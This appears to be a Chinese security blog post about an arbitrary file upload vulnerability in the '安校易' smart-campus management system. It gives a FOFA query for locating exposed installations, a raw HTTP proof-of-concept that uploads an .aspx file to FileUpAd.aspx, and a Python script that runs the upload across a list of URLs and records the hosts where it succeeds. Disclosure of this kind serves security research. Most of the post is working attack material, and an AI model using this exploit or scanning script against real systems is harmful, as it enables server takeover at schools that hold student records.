目录
前言
免责声明
博文中涉及的方法可能带有危害性,仅供安全研究与教学之用,读者将其方法用作做其他用途,由读者承担全部法律及连带责任,文章作者不负任何责任.
一、漏洞简介
“安校易”是银达云创公司基于多年教育市场信息化建设经验沉淀,经过充分的客户需求调研,并依据国家“十三五”教育信息化建设规范而推出的综合互联网+教育信息化解决方案。“安校易”以物联网技术为基础,以学生在校“学食住行”管理为中心,将消费管理、门禁管理、各类学生出入管理、家校互通、校门口进出身份识别等系统进行集成,有效减少校园管理盲点,提升校园安全防范与管理水平。福州银达云创信息科技有限公司智慧校园(安校易)管理系统FileUpAd任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
二、影响版本
智慧校园(安校易)管理系统
三、资产测绘
fofa:title="智慧综合管理平台登入"
四、漏洞复现
POC:
POST /Module/FileUpPage/FileUpAd.aspx?orgid=1&type=NNewsContent HTTP/1.1
Host:
Accept-Encoding: identity
Content-Length: 337
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=62907949903a4c499178971c9dab4ad9
--62907949903a4c499178971c9dab4ad9
Content-Disposition: form-data; name="Filedata"; filename="abc.aspx"
Content-Type: image/jpeg
edusrc
--62907949903a4c499178971c9dab4ad9--
访问路径
/imgnews/imgad/1/.aspx
批量测试脚本:
# -*- coding:utf-8 -*-
import requests
import urllib3
# 禁用 SSL 证书验证警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def send_post_request(url, output_file):
post_url = url + "/Module/FileUpPage/FileUpAd.aspx?orgid=1&type=NNewsContent"
headers = {
"Accept-Encoding": "identity",
"Content-Length": "337",
"Accept-Language": "zh-CN,zh;q=0.8",
"Accept": "*/*",
"User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3",
"Connection": "keep-alive",
"Cache-Control": "max-age=0",
"Content-Type": "multipart/form-data; boundary=62907949903a4c499178971c9dab4ad9"
}
data = (
"--62907949903a4c499178971c9dab4ad9\r\n"
"Content-Disposition: form-data; name=\"Filedata\"; filename=\"abc.aspx\"\r\n"
"Content-Type: image/jpeg\r\n\r\n"
"edusrc\r\n"
"--62907949903a4c499178971c9dab4ad9--"
)
try:
response = requests.post(post_url, headers=headers, data=data, verify=False, timeout=10)
if response.status_code == 200 and ".aspx" in post_url:
check_url = url + "/imgnews/imgad/1/.aspx"
check_response = requests.get(check_url, verify=False, timeout=10)
if check_response.status_code == 200 and "edusrc" in check_response.text:
result = f"状态码: {check_response.status_code}, 发送地址: {check_url}"
print(result)
with open(output_file, "a") as f:
f.write(result + "\n")
else:
print(f"状态码: {check_response.status_code}, 响应内容不包含 'edusrc' 或其他错误: {check_url}")
else:
print(f"状态码: {response.status_code}, 地址不包含 .aspx: {post_url}")
except Exception as e:
print(f"请求失败:{e}")
if __name__ == '__main__':
output_file = "output.txt"
with open("edusrc.txt", "r") as file:
urls = file.readlines()
for url in urls:
url = url.strip()
if not url:
continue
if not url.startswith("http://") and not url.startswith("https://"):
url = "http://" + url
send_post_request(url, output_file)
python +脚本名.py
五、修复建议
1、如⾮必要,禁⽌公⽹访问该系统。
2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。
3、升级产品到最新版本